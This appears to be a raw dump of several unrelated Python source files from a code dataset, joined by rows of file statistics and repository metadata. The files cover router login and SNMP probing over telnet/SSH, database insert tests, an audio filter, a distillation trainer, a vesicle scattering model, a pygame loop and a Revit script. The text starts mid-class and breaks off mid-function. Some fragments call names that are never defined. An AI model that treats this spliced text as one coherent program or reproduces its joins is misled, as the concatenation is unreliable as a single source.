def scan_snmp_system_info(self, snmp_community):
snmp_version = 0
while True:
if snmp_version == 3:
break
errorIndication, errorStatus, errorIndex, varBinds = next(
getCmd(SnmpEngine(),
CommunityData(snmp_community, mpModel=snmp_version),
UdpTransportTarget(('{}'.format(self.ip), 161),
timeout=2.0,
retries=1),
ContextData(),
ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0)))
)
if errorIndication.__str__() =='No SNMP response received before timeout':
raise FailedSnmpCommunity(snmp_community)
if errorIndication.__str__() == 'No SNMP response received before timeout':
snmp_version += 1
if errorIndication:
snmp_version += 1
elif errorStatus:
snmp_version += 1
else:
return varBinds[0].prettyPrint()
def send_short_commands(self, commands_str, log_out=False):
self.logger.critical('START')
list_of_commands = list(
map(
str.strip, commands_str.split('\n')
)
)
if self.mng_protocol.lower() == 'telnet':
res = self.send_command_via_telnet(list_of_commands, log_out=log_out)
else:
res = self.send_command_via_ssh(list_of_commands, log_out=log_out)
for line in res.split('\n'):
self.logger.critical(f'answers: {line.strip()}')
self.logger.critical('END')
return res
def send_command_via_telnet(self, list_of_commands, log_out=False):
res = ''
output = ''
answer = b''
# to clear the output
self.connection.write(b"\n")
time.sleep(self.answer_delay)
self.connection.read_very_eager()
try:
for line in list_of_commands:
self.logger.critical(f'command: {line.strip()}')
self.connection.write(line.encode('utf-8') + b'\n')
time.sleep(int(self.answer_delay) * 2)
answer = self.connection.read_very_eager()
if not answer:
raise ConfigurationError(f'{line.strip()} has no answers')
# replace ansi abra-cadabra like "\x1b[24;1H"
answer = replace_ansi_char(answer)
output += answer.decode('utf-8')
# end execution in case of log out command
if log_out:
return ''
self.connection.write(self.command_to_root.encode('utf-8')) # ^Z == b"\x1A"
time.sleep(self.answer_delay)
self.connection.write('\n'.encode("utf-8"))
# to get full command response
start_time = time.time()
while True:
answer = b''
self.connection.write('\n'.encode("utf-8"))
if time.time() - start_time > 60:
raise ConfigurationError(f'to long output waiting.'
f'Output: "{output}"')
self.connection.write('\n'.encode("utf-8"))
answer += self.connection.read_very_eager()
if answer:
# replace abra-cadabra like "\x1b[24;1H"
answer = replace_ansi_char(answer)
output += convert_to_utf(answer)
if re.search(HOST_NAME_REG, answer.split(b'\n')[-1].strip()):
break
time.sleep(self.answer_delay)
for line in re.split('\r\n|\n', output):
res += line + '\n'
return res
except Exception as e:
self.logger.critical(e.__str__())
self.logger.exception(e.__str__())
if not self.connection:
self._log_in()
return ''
def send_command_via_ssh(self, list_of_commands, log_out=False):
res = ''
output = ''
# to clear the output
self.connection.send(self.command_line_break.encode('utf-8'))
time.sleep(self.answer_delay)
if self.vendor.lower() == 'mikrotik':
time.sleep(self.answer_delay)
self.connection.recv(65000)
try:
# send command one by one
for line in list_of_commands:
self.logger.critical(f'command: {line.strip()}')
self.connection.send(line.encode('utf-8') + self.command_line_break.encode('utf-8'))
time.sleep(self.answer_delay)
if self.vendor.lower() == 'mikrotik':
time.sleep(self.answer_delay)
output_bin = self.connection.recv(65000)
# replace ansi abra-cadabra like "\x1b[24;1H"
output_bin = replace_ansi_char(output_bin)
output += convert_to_utf(output_bin)
if not output:
raise ConfigurationError(f'{line.strip()} has no answers')
# end execution in case of log out command
if 'closed' in self.connection.__str__() and log_out:
return ''
# return to root
self.connection.send(self.command_to_root.encode('utf-8')) # ^Z == b"\x1A"
time.sleep(self.answer_delay)
if self.vendor.lower() == 'mikrotik':
time.sleep(self.answer_delay)
self.connection.send(self.command_line_break.encode('utf-8'))
# to get full command response
start_time = time.time()
while True:
answer = b''
out = b''
if time.time() - start_time > 60:
raise ConfigurationError(f'to long output waiting.'
f'Output: "{output}"')
# send empty line
self.connection.send(line.encode('utf-8') + self.command_line_break.encode('utf-8'))
time.sleep(self.answer_delay)
if self.vendor.lower() == 'mikrotik':
time.sleep(self.answer_delay)
# get response
answer += self.connection.recv(65000)
if answer:
# replace ansi abra-cadabra like "\x1b[24;1H"
clear_answer = replace_ansi_char(answer)
output += clear_answer.decode('utf-8')
if re.search(
HOST_NAME_REG, re.split(b'\r|\n|\r\n|\n\r', clear_answer)[-1].strip()
):
break
time.sleep(self.answer_delay)
continue
for line in re.split('\r\n|\n', output):
res += line + '\n'
return res
except Exception as e:
self.logger.critical(e.__str__())
self.logger.exception(e.__str__())
if not self.connection:
self._log_in()
return ''
def get_show_command_output(self, command):
host_names_set: set = set() # len of set should be equal to 1
if not self.connection:
self.logger.critical('no connection')
return ''
output = self.send_short_commands(command)
clear_result = ''
start = False
for line in map(str.strip, output.split('\n')):
if not line:
continue
if command.strip() in line:
start = True
continue
if re.search(HOST_NAME_REG.decode('utf-8'), line):
# sometimes name of version may there be in line line "[V200R005C20SPC200]",
# net_node look at this like hostname.
# To eliminate this
if [x for x in self.releases_list if x.lower().strip() in line.lower().strip()]:
continue
# if self.release.lower() in line.lower() and self.vendor.lower() == 'huawei':
#
# continue
host_names_set.add(line)
start = False
if start:
clear_result += line + '\n'
if len(host_names_set) != 1:
raise NotSingleHostnameFound(f'ERROR: find more than 1 hostname_lines {host_names_set}')
if output and not clear_result:
raise NotClearOutput(f'ERROR: len of row output: {len(output)} and no clear_result')
return clear_result
def login_via_telnet(self):
answer = b''
try:
tn = telnetlib.Telnet(self.ip, 23, self.answer_delay + 10)
try:
exp = tn.expect([b"Press any key to continue"], timeout=2)
if exp[1]:
answer += exp[2]
tn.write(b'1\n')
time.sleep(self.answer_delay)
except:
pass
try:
exp = tn.expect(
[b"Username: ",
b"login: ",
b"login as: ",
b"Username:",
b"username:",
b"username: ",
b"login:",
b"UserName:",
b"Tacacs UserName:",
b"Radius UserName:"],
timeout=self.answer_delay)
if exp[1]:
answer += exp[2]
tn.write(self.user.encode("utf-8") + b"\n")
time.sleep(self.answer_delay + 10)
except:
self.logger.critical('no "Username:" string')
finally:
tn.write(self.password.encode("utf-8") + b"\n")
time.sleep(self.answer_delay)
password_string = replace_ansi_char(tn.read_very_eager())
answer += password_string
find = False
for line in password_string.split(b'\n'):
if re.search(HOST_NAME_REG, line.strip()): find = True
if not find:
raise ConnectionRefusedError('HOST_NAME_REG was not find after credentials was sent')
answer += tn.read_very_eager()
self.find_info(replace_ansi_char(answer).decode('utf-8'))
self.logger.critical('SUCCESS')
return tn
except Exception as e:
self.logger.critical(e.__str__())
self.logger.exception(e.__str__())
return
def login_via_ssh(self):
try:
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(hostname=self.ip,
username=self.user,
password=self.password,
look_for_keys=False,
allow_agent=False,
timeout=self.connection_timeout,
banner_timeout=70)
ssh = client.invoke_shell()
ssh.timeout = self.connection_timeout
time.sleep(self.answer_delay)
self.logger.critical('SUCCESS')
return ssh
except paramiko.ssh_exception.SSHException as e:
if 'Incompatible ssh server' in e.__str__() or \
'Negotiation failed.' in e.__str__() or \
'Bad authentication type' in e.__str__() and self.telnet:
self.logger.critical('ssh corrupted version, manage protocol switch to telnet')
self.mng_protocol = 'telnet'
return self.login_via_telnet()
except:
self.logger.critical('error')
self.logger.exception('error')
def _log_in(self):
"""
return connected_object
"""
answer_string = b''
if not self.mng_protocol:
self.scan_mng_protocols()
if not self.mng_protocol:
raise NotMngProtocol('no ssh no telnet')
if self.mng_protocol.lower() == 'ssh':
self.connection = self.login_via_ssh()
elif self.mng_protocol.lower() == 'telnet':
self.connection = self.login_via_telnet()
if self.connection:
# for telnet get_info executed in "login_via_telnet" section
if self.mng_protocol.lower() == 'ssh':
while True:
if self.connection.recv_ready():
break
self.connection.send(self.command_line_break)
time.sleep(self.answer_delay)
if self.vendor.lower() == 'mikrotik':
time.sleep(self.answer_delay)
answer_string = self.connection.recv(65000)
answer_string = replace_ansi_char(answer_string).decode('utf-8')
self.find_info(answer_string)
if not (
self.vendor and
self.os and
self.image_name and
self.image_version and
self.release and
self.platform
):
self.find_info(
self.send_short_commands(
self.command_info
)
)
self.send_short_commands(
self.command_screen_length_disable
)
if not (
self.vendor and
self.os and
self.image_name and
self.image_version and
self.release and
self.platform
):
self.find_info(
self.send_short_commands(
self.command_info
)
)
self.send_short_commands(
self.command_screen_length_disable
)
else:
raise NoConnection
def log_out(self):
if not self.connection:
self.logger.critical('no connection')
return False
logout_command = self.command_logout
if self.mng_protocol.lower() == 'telnet':
logout_command = logout_command
try:
self.send_short_commands(logout_command, log_out=True)
time.sleep(10)
self.connection.close()
self.connection = None
except Exception as e:
self.logger.exception(e.__str__())
self.logger.critical('SUCCESS')
| 28.954023 | 105 | 0.507394 | 19,586 | 0.971913 | 0 | 0 | 0 | 0 | 0 | 0 | 2,715 | 0.134726 |
2ba537585718a0a24f20f73225113ab2e26600eb | 3,472 | py | Python | test/test_insert_documents.py | ShaneKilkelly/bedquilt | beaee513a015ed0dd633b738517b33eb7c4c42a3 | [
"MIT"
] | 288 | 2015-04-20T18:14:39.000Z | 2021-10-30T01:35:44.000Z | test/test_insert_documents.py | ShaneKilkelly/bedquilt | beaee513a015ed0dd633b738517b33eb7c4c42a3 | [
"MIT"
] | 21 | 2015-04-13T12:48:40.000Z | 2017-05-27T12:41:10.000Z | test/test_insert_documents.py | ShaneKilkelly/bedquilt | beaee513a015ed0dd633b738517b33eb7c4c42a3 | [
"MIT"
] | 19 | 2015-11-03T09:25:00.000Z | 2021-05-01T00:28:02.000Z | import testutils
import json
import string
import psycopg2
class TestInsertDocument(testutils.BedquiltTestCase):
def test_insert_into_non_existant_collection(self):
doc = {
"_id": "user@example.com",
"name": "Some User",
"age": 20
}
self.cur.execute("""
select bq_insert('people', '{}');
""".format(json.dumps(doc)))
result = self.cur.fetchone()
self.assertEqual(
result, ('user@example.com',)
)
self.cur.execute("select bq_list_collections();")
collections = self.cur.fetchall()
self.assertIsNotNone(collections)
self.assertEqual(collections, [("people",)])
def test_with_non_string_id(self):
docs = [
{
"_id": 42,
"name": "Penguin",
"age": "penguin@example.com"
},
{
"_id": ['derp'],
"name": "Penguin",
"age": "penguin@example.com"
},
{
"_id": {"name": "Penguin"},
"age": "penguin@example.com"
},
{
"_id": False,
"name": "Penguin",
"age": "penguin@example.com"
},
{
"_id": None,
"name": "Penguin",
"age": "penguin@example.com"
}
]
for doc in docs:
with self.assertRaises(psycopg2.InternalError):
self.cur.execute("""
select bq_insert('people', '{}');
""".format(json.dumps(doc)))
self.conn.rollback()
def test_insert_without_id(self):
doc = {
"name": "Some User",
"age": 20
}
self.cur.execute("""
select bq_insert('people', '{}');
""".format(json.dumps(doc)))
result = self.cur.fetchone()
self.assertIsNotNone(result)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), 1)
_id = result[0]
self.assertIn(type(_id), {str, unicode})
self.assertEqual(len(_id), 24)
for character in _id:
self.assertIn(character, string.hexdigits)
def test_with_single_quotes_in_field(self):
doc = {
"description": "Something I've eaten"
}
self.cur.execute("""
select bq_insert('things', %s);
""", (json.dumps(doc),))
result = self.cur.fetchone()
self.assertIsNotNone(result)
def test_insert_with_repeat_id(self):
doc = {
"_id": "user_one",
"name": "Some User",
"age": 20
}
self.cur.execute("""
select bq_insert('people', '{}');
""".format(json.dumps(doc)))
result = self.cur.fetchone()
self.assertIsNotNone(result)
self.assertEqual(type(result), tuple)
self.assertEqual(len(result), 1)
_id = result[0]
self.assertEqual(_id, "user_one")
self.conn.commit()
with self.assertRaises(psycopg2.IntegrityError):
self.cur.execute("""
select bq_insert('people', '{}');
""".format(json.dumps(doc)))
self.conn.rollback()
self.cur.execute("select count(*) from people;")
result = self.cur.fetchone()
self.assertEqual(result, (1,))
| 27.338583 | 59 | 0.489343 | 3,410 | 0.982143 | 0 | 0 | 0 | 0 | 0 | 0 | 852 | 0.245392 |
2ba5755aba035a21c8456b8d1f629b971c609de8 | 734 | py | Python | pywizard/PreEmphasizer.py | sintech/python_wizard | 397cac3abc2b74bc20a0ca202e3df0d990730dd4 | [
"MIT"
] | 28 | 2017-10-08T14:41:17.000Z | 2022-01-21T09:09:31.000Z | pywizard/PreEmphasizer.py | sintech/python_wizard | 397cac3abc2b74bc20a0ca202e3df0d990730dd4 | [
"MIT"
] | 17 | 2017-10-29T20:35:19.000Z | 2022-03-09T10:01:55.000Z | pywizard/PreEmphasizer.py | sintech/python_wizard | 397cac3abc2b74bc20a0ca202e3df0d990730dd4 | [
"MIT"
] | 12 | 2017-11-14T12:37:39.000Z | 2022-01-20T20:38:08.000Z | from pywizard.userSettings import settings
import scipy as sp
class PreEmphasizer(object):
@classmethod
def processBuffer(cls, buf):
preEnergy = buf.energy()
alpha = cls.alpha()
unmodifiedPreviousSample = buf.samples[0]
tempSample = None
first_sample = buf.samples[0]
buf.samples = buf.samples[1:] + (buf.samples[:-1] * alpha)
buf.samples = sp.insert(buf.samples, 0, first_sample)
cls.scaleBuffer(buf, preEnergy, buf.energy())
@classmethod
def alpha(cls):
return settings.preEmphasisAlpha
@classmethod
def scaleBuffer(cls, buf, preEnergy, postEnergy):
scale = sp.sqrt(preEnergy / postEnergy)
buf.samples *= scale
| 24.466667 | 66 | 0.644414 | 668 | 0.910082 | 0 | 0 | 623 | 0.848774 | 0 | 0 | 0 | 0 |
2ba6cae52049d7f6aac58f13b91780ebbd646035 | 3,528 | py | Python | model_measuring/kamal/slim/distillation/data_free/zskt.py | Gouzhong1223/Dubhe | 8959a51704410dc38b595a0926646b9928451c9a | [
"Apache-2.0"
] | 1 | 2022-01-11T07:14:37.000Z | 2022-01-11T07:14:37.000Z | model_measuring/kamal/slim/distillation/data_free/zskt.py | Gouzhong1223/Dubhe | 8959a51704410dc38b595a0926646b9928451c9a | [
"Apache-2.0"
] | 1 | 2022-03-04T07:19:43.000Z | 2022-03-04T07:19:43.000Z | model_measuring/kamal/slim/distillation/data_free/zskt.py | Gouzhong1223/Dubhe | 8959a51704410dc38b595a0926646b9928451c9a | [
"Apache-2.0"
] | 1 | 2022-03-20T13:09:14.000Z | 2022-03-20T13:09:14.000Z | """
Copyright 2020 Tianshu AI Platform. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=============================================================
"""
import torch
import time
import torch.nn.functional as F
from kamal.slim.distillation.kd import KDDistiller
from kamal.utils import set_mode
from kamal.core.tasks.loss import kldiv
class ZSKTDistiller(KDDistiller):
def __init__( self,
student,
teacher,
generator,
z_dim,
logger=None,
viz=None):
super(ZSKTDistiller, self).__init__(logger, viz)
self.teacher = teacher
self.model = self.student = student
self.generator = generator
self.z_dim = z_dim
def train(self, start_iter, max_iter, optim_s, optim_g, device=None):
if device is None:
device = torch.device( 'cuda' if torch.cuda.is_available() else 'cpu' )
self.device = device
self.optim_s, self.optim_g = optim_s, optim_g
self.model.to(self.device)
self.teacher.to(self.device)
self.generator.to(self.device)
self.train_loader = [0, ]
with set_mode(self.student, training=True), \
set_mode(self.teacher, training=False), \
set_mode(self.generator, training=True):
super( ZSKTDistiller, self ).train( start_iter, max_iter )
def search_optimizer(self, evaluator, train_loader, hpo_space=None, mode='min', max_evals=20, max_iters=400):
optimizer = hpo.search_optimizer(self, train_loader, evaluator=evaluator, hpo_space=hpo_space, mode=mode, max_evals=max_evals, max_iters=max_iters)
return optimizer
def step(self):
start_time = time.perf_counter()
# Adv
z = torch.randn( self.z_dim ).to(self.device)
fake = self.generator( z )
self.optim_g.zero_grad()
t_out = self.teacher( fake )
s_out = self.student( fake )
loss_g = -kldiv( s_out, t_out )
loss_g.backward()
self.optim_g.step()
with torch.no_grad():
fake = self.generator( z )
t_out = self.teacher( fake.detach() )
for _ in range(10):
self.optim_s.zero_grad()
s_out = self.student( fake.detach() )
loss_s = kldiv( s_out, t_out )
loss_s.backward()
self.optim_s.step()
loss_dict = {
'loss_g': loss_g,
'loss_s': loss_s,
}
step_time = time.perf_counter() - start_time
# record training info
info = loss_dict
info['step_time'] = step_time
info['lr_s'] = float( self.optim_s.param_groups[0]['lr'] )
info['lr_g'] = float( self.optim_g.param_groups[0]['lr'] )
self.history.put_scalars( **info )
def reset(self):
self.history = None
self._train_loader_iter = iter(train_loader)
self.iter = self.start_iter
| 35.28 | 155 | 0.604592 | 2,681 | 0.759921 | 0 | 0 | 0 | 0 | 0 | 0 | 752 | 0.213152 |
2ba7784bc827b850acbbb011ada9ad1f701f4989 | 11,442 | py | Python | crease_ga/shapes/vesicle/scatterer_generator.py | arthijayaraman-lab/crease-ga | e757811d73687b3cd1df2d40d607a37116a20a7d | [
"MIT"
] | null | null | null | crease_ga/shapes/vesicle/scatterer_generator.py | arthijayaraman-lab/crease-ga | e757811d73687b3cd1df2d40d607a37116a20a7d | [
"MIT"
] | 6 | 2021-07-27T16:26:35.000Z | 2022-03-14T19:47:01.000Z | crease_ga/shapes/vesicle/scatterer_generator.py | arthijayaraman-lab/crease_ga | e757811d73687b3cd1df2d40d607a37116a20a7d | [
"MIT"
] | 2 | 2021-07-20T18:04:32.000Z | 2021-07-20T18:10:27.000Z | import numpy as np
import random
import numexpr as ne
def gen_layer(rin, rout, nsize):
R = 1.0
phi = np.random.uniform(0, 2*np.pi, size=(nsize))
costheta = np.random.uniform(-1, 1, size=(nsize))
u = np.random.uniform(rin**3, rout**3, size=(nsize))
theta = np.arccos( costheta )
r = R * np.cbrt( u )
x = r * np.sin( theta ) * np.cos( phi )
y = r * np.sin( theta ) * np.sin( phi )
z = r * np.cos( theta )
return( x, y, z )
def LPFbead(qrange, sigmabead):
'''
Compute the spherical form factor given a range of q values.
Parameters
----------
qrange: numpy.array
array of values in q-space to compute form factor for.
sigmabead: float
diameter of the sphere.
Return
-------
Fqb: numpy.array
array of values of the spherical form factors (F(q)) computed at q-points listed in qrange.
'''
R=np.true_divide(sigmabead,2)
QR=np.multiply(qrange,R)
Fqb=np.multiply(np.true_divide(np.sin(QR)-np.multiply(QR,np.cos(QR)),np.power(QR,3)),3)
return Fqb
def LPOmega(qrange, nAin, nAout, nB, r): # qvalues number_of_B number_of_A scatterer_coordinates
Ntot=nAin+nB+nAout # Total number of scatterers to loop through
omegaarrt=np.zeros((1,len(qrange))) # initiating array
omegaarr=np.zeros((1,len(qrange))) # initiating array
rur=r[0,:,:]# selects
rur=rur.transpose()
for i in range(Ntot-1): # loops through index and all further indexes to prevent double counting
all_disp = rur[i,:]-rur[(i+1):,:]
rij = np.sqrt(np.sum(np.square(all_disp),axis=1))
rij = rij.transpose()
rs = rij[:,np.newaxis] # reshapes array for consistency
Q = qrange[np.newaxis,:] # reshapes array for consistency
vals = ne.evaluate("sin(Q*rs)/(Q*rs)") # ne is efficient at calculations
inds=np.argwhere(np.isnan(vals)) # error catching in case there are NaN values
if len(inds)>0:
for val in inds:
vals[val[0],val[1]]=1
inds_double_check=np.argwhere(np.isnan(vals))
if len(inds_double_check)>0:
print('nan error!')
vals = ne.evaluate("sum((vals), axis=0)") # adds together scatterer contributions for each q value
omegaarr+=vals
omegaarr=np.true_divide(2*omegaarr,Ntot)+1 # 1 accounts for the guarenteed overlap of same bead # 2* accounts for double counting avoided to reduce computational expense by looping for all other pairs
omegaarrt+=omegaarr # stores values between loops
return omegaarrt
def visualize(r, Rcore, dR_Ain, dR_B, dR_Aout, sigmabead):
import py3Dmol
view = py3Dmol.view()
for ri in r[0,:,:].transpose():
if np.linalg.norm(ri) < Rcore+dR_Ain or np.linalg.norm(ri) > (Rcore+dR_Ain+dR_B):
col = 'blue'
else:
col = 'red'
view.addSphere(
{
'center': {'x': ri[0], 'y': ri[1], 'z': ri[2]},
'radius': sigmabead/2,
'color': col,
'alpha': 0.9,
}
)
#view.zoomTo()
view.show()
return view
def genLP(Rcore, dR_Ain, dR_B, dR_Aout, sigmabead, nAin, nAout, nB):
# core radius, inner A layer thickness, B layer thickness, outer A layer thickness,
# bead diameter, # of inner A beads, # of outer A beads, # of B beads
ntot = nAin+nB+nAout
power = 2
r = np.zeros((1, 3, ntot))
types = np.zeros((ntot))
### Create configuration for each replicate with dispersity ###
for step in range(0, 1):
### Populate A inner Layer ###
x, y, z = gen_layer(Rcore, Rcore+dR_Ain, nAin)
for i in range(nAin):
r[0,:,i] = [x[i], y[i], z[i]]
types[i] = 1
### Populate B middle Layer ###
x, y, z = gen_layer(Rcore+dR_Ain, Rcore+dR_Ain+dR_B, nB)
for i in range(nB):
r[0,:,i+nAin] = [x[i], y[i], z[i]]
types[i+nAin] = 2
### Populate A outer Layer ###
x, y, z = gen_layer(Rcore+dR_Ain+dR_B, Rcore+dR_Ain+dR_B+dR_Aout, nAout)
for i in range(nAout):
r[0,:,i+nAin+nB] = [x[i], y[i], z[i]]
types[i+nAin+nB] = 1
return r
class scatterer_generator:
'''
The wrapper class for vesicle shape. Default length unit: Angstrom.
Notes
-----
**The following 7 shape-specific descriptors are to be specified by user (see
*Attributes*) as
a list, in the precise order as listed, while calling `Model.load_shape`
to load this shape:**
num_scatterers:
Number of scatterers used to represent a chain. Default: 24
N:
Number of monomers in a chain. Default: 54
eta_B:
Packing fraction of scatterers in B layer. Default: 0.5
lmono_b:
Diameter of a monomer of chemistry B. Default: 50.4 A
lmono_a:
Diameter of a monomer of chemistry A. Default: 50.4 A
fb:
Fraction of monomers in chain that are of B type. fa = 1-fb. Default: 0.55
nLP:
Number of replicates for each individual. Default: 7
**The following 7 parameters are to be predicted, in the precise order
as listed, by GA:**
R_core:
Core radius. Default [min,max]: [50 A, 400 A]
t_Ain:
Thickness of inner A layer. Default [min,max]: [30 A, 200 A]
t_B:
Thickness of B layer. Default [min,max]: [30 A, 200 A]
t_Aout:
Thickness of outer A layer. Default [min,max]: [30 A, 200 A]
sigma_Ain:
Split of solvophilic scatterers between inner and outer layers.
Default [min,max]: [0.1, 0.45]
sigma_R:
Dispersity in vesicle size as implemented in the core radius.
Default [min,max]: [0.0, 0.45]
log10(bg):
Negative log10 of background intensity.
E.g. an background intensity of 0.001 leads to this value being 3.
Default [min,max]: [0.1,4]
See also
--------
crease_ga.Model.load_shape
'''
def __init__(self,
shape_params = [24,54,0.5,50.4,50.4,0.55,7],
minvalu = (50, 30, 30, 30, 0.1, 0.0, 0.1),
maxvalu = (400, 200, 200, 200, 0.45, 0.45, 4)):
num_scatterers = shape_params[0]
N = shape_params[1]
rho_B = shape_params[2]
lmono_a = shape_params[3]
lmono_b= shape_params[4]
fb = shape_params[5]
nLP = shape_params[6]
self._numvars = 7
self.minvalu = minvalu
self.maxvalu = maxvalu
self.num_scatterers=num_scatterers ## number of scatterers per chain
self.N=N ## Number of beads on chain
self.rho_B=rho_B ## density/volume fraction of beads in B layer
self.lmono_a=lmono_a ## Angstrom 'monomer contour length'
self.lmono_b=lmono_b ## Angstrom 'monomer contour length'
self.MB=np.pi/6*(self.lmono_b)**3 ## volume of B monomer
self.sigmabead=np.true_divide(self.N*self.lmono_b,self.num_scatterers) ## scatterer bead diameter
self.fb=fb ## fraction of B type monomers in chain
self.nLP=nLP ## number of replicates
@property
def numvars(self):
return self._numvars
def converttoIQ(self, qrange, param):
'''
Calculate computed scattering intensity profile.
Parameters
----------
qrange: numpy.array
q values.
param: numpy.array
Decoded input parameters. See *Notes* section of the class
documentation.
Returns
-------
IQid: A numpy array holding I(q).
'''
# q values, decoded parameters,
# number of repeat units per chain, fraction of B beads per chain, core density,
# scatterer diameter, molar mass of B chemistry,
# length of A chemistry bond, length of B chemistry bond,
# number of scatterers per chain, # of replicates, stdev in Rcore size
sigmabead = self.sigmabead
N = self.N
fb = self.fb
rho_B = self.rho_B
MB = self.MB
lmono_a = self.lmono_a
lmono_b = self.lmono_b
num_scatterers = self.num_scatterers
nLP = self.nLP
IQid=np.zeros((len(qrange))) #initiates array for output IQ
### Parameters used to generate scatterer placements ###
Rcore=param[0]
dR_Ain=param[1]
dR_B=param[2]
dR_Aout=param[3]
sAin=param[4] # split of type A scatterer
sigmaR=param[5] # variation in Rcore, dispersity
#print(Rcore, dR_Ain, dR_B, dR_Aout, sAin)
Background=10**(-param[6])
varR = Rcore*sigmaR # variation in Rcore
disper = np.array([-2.0, -1.5, -1.0, -0.5, 0.0, 0.5, 1.0, 1.5, 2.0]) # fixed intervals of sigma
sum_omegaarr=np.zeros((1,len(qrange)))
for step in range(0, nLP):
Rcore = param[0] + varR*disper[step + int((9-nLP)/2.)] ## add displacement to Rcore
# print("disper = ", disper[step + int((9-nLP)/2.)])
# print("Rcore = ", Rcore)
vol_B = (4/3.0)*np.pi*(np.power(Rcore + dR_Ain + dR_B, 3)
- np.power(Rcore + dR_Ain, 3)) ## volume of solvophobic layer B
nagg = int(np.true_divide( rho_B*vol_B, N*fb*MB )) ## number of chains in vesicle
ntot = nagg*num_scatterers ## total number of scatterers
nB = int(ntot*fb) ## number of scatterers in B
nAin = int(ntot*(1-fb)*sAin) ## number of scatterers in A_in
nAout = int(ntot*(1-fb)*(1-sAin)) ## number of scatterers in A_out
for reps in range(0, 3):
### Generates scatterer positions in structure ###
r = genLP(Rcore, dR_Ain, dR_B, dR_Aout, sigmabead, nAin, nAout, nB)
### Calculates omega from scatterers in shape ###
sum_omegaarr += LPOmega(qrange, nAin, nAout, nB, r)
omegaarr=np.true_divide(sum_omegaarr,nLP*3) # average omega
omegaarr=omegaarr.reshape(len(qrange),)
Fqb=LPFbead(qrange,sigmabead) # calcualtes sphere shape factor
F2qb=np.multiply(Fqb,Fqb) # Sphere shape factor square
sqmm=np.ones((np.shape(Fqb))) # assuming dilute mixture the micelle-micelle structure factor = 1
F2qb_sqmm=np.multiply(F2qb,sqmm) # determines the micelle form factor
IQid=np.multiply(omegaarr,F2qb_sqmm) # calculates Icomp
maxIQ=np.max(IQid)
IQid=np.true_divide(IQid,maxIQ) # normalizes the I(q) to have its maximum = 1
IQid+=Background # add background
return IQid
| 39.184932 | 210 | 0.549205 | 6,800 | 0.594302 | 0 | 0 | 61 | 0.005331 | 0 | 0 | 5,001 | 0.437074 |
2ba7860171b35ef1fd22e6ca196a4bf0cdd6ce68 | 841 | py | Python | main.py | fmiju/fssg3 | ffda53e9e65a9ecd22c853e80a0af0226a4b22e4 | [
"BSD-3-Clause"
] | null | null | null | main.py | fmiju/fssg3 | ffda53e9e65a9ecd22c853e80a0af0226a4b22e4 | [
"BSD-3-Clause"
] | null | null | null | main.py | fmiju/fssg3 | ffda53e9e65a9ecd22c853e80a0af0226a4b22e4 | [
"BSD-3-Clause"
] | null | null | null | import pygame
from pygame.locals import *
gameState = 0
pygame.init()
while 1:
# print "state: ", gameState
# idle
if gameState == 0:
print pygame.event.get()
for event in pygame.event.get():
if (event.type == KEYDOWN and event.key == K_SPACE):
gameState = 1
# build ship
elif gameState == 1:
for event in pygame.event.get():
if (event.type == KEYDOWN and event.key == K_1):
gameState = 2
# shoot
elif gameState == 2:
for event in pygame.event.get():
if (event.type == KEYDOWN and event.key == K_2):
gameState = 3
# dead
elif gameState == 3:
for event in pygame.event.get():
if (event.type == KEYDOWN and event.key == K_r):
gameState = 0
elif (event.type == KEYDOWN and event.key == K_q):
gameState = 4
# quit
elif gameState == 4:
print "quitting"
else:
print 'meow'
| 21.025 | 55 | 0.630202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 81 | 0.096314 |
2bad3c5762b8c994d171a46e6e014d25fb8793f4 | 4,974 | py | Python | BikeAndBim.extension/BikeAnd.tab/View.panel/Edit_crop.pushbutton/script.py | appolimp/Revit_extensions_pyRevit | 1790b18c12e8bc603a6a726b2733678494180986 | [
"MIT"
] | 4 | 2021-02-04T06:24:27.000Z | 2022-01-29T20:24:22.000Z | BikeAndBim.extension/BikeAnd.tab/View.panel/Edit_crop.pushbutton/script.py | appolimp/Revit_extensions_pyRevit | 1790b18c12e8bc603a6a726b2733678494180986 | [
"MIT"
] | null | null | null | BikeAndBim.extension/BikeAnd.tab/View.panel/Edit_crop.pushbutton/script.py | appolimp/Revit_extensions_pyRevit | 1790b18c12e8bc603a6a726b2733678494180986 | [
"MIT"
] | null | null | null | # coding=utf-8
from rpw import db, DB, UI, uidoc, doc, logger
def task_dialog(msg):
"""
For create task dialog with error and message
:param msg: Message for window
:type msg: str
"""
window = UI.TaskDialog('Edit crop')
window.TitleAutoPrefix = False
window.MainIcon = UI.TaskDialogIcon.TaskDialogIconError
window.MainInstruction = 'Error'
window.MainContent = msg
window.CommonButtons = UI.TaskDialogCommonButtons.Ok
window.Show()
def box_selection():
"""
Get two points by user rectangle selection
:returns (DB.XYZ, DB.XYZ)
:rtype tuple
"""
style = UI.Selection.PickBoxStyle.Enclosing
data = uidoc.Selection.PickBox(style, 'select two point')
return data.Min, data.Max
@db.Transaction.ensure('Edit crop view')
def set_view_crop_by_point(view, down_left, up_right):
"""
Set view crop of view by min and max point
:param view: DB.View
:param down_left: DB.XYZ
:param up_right: DB.XYZ
"""
box = view.CropBox
box.Min = down_left + box.Min.Z * DB.XYZ.BasisZ
box.Max = up_right + box.Max.Z * DB.XYZ.BasisZ
doc.ActiveView.CropBox = box
def calc_x_y_plan(view, point):
"""
Calculate point coordinate in plane of plane view
- Calculate offset of view origin
- Rotate point to angle between view.UpDirection and DB.XYZ.BasisY
:param view: DB.ViewPlan
:param point: DB.XYZ
:return: DB.XYZ in plane view
"""
normal_val = point - view.Origin - (point - view.Origin).Z * DB.XYZ.BasisZ
angle = calc_angle(view.UpDirection, DB.XYZ.BasisY)
rot_point = rotate_by_point_and_angle(normal_val, DB.XYZ.Zero, angle)
return rot_point
def calc_angle(main_vector, second_vector):
"""
Calculate angle between two vectors
:param main_vector: DB.XYZ
:param second_vector: DB.XYZ
:return: Angle with sign
:rtype: float
"""
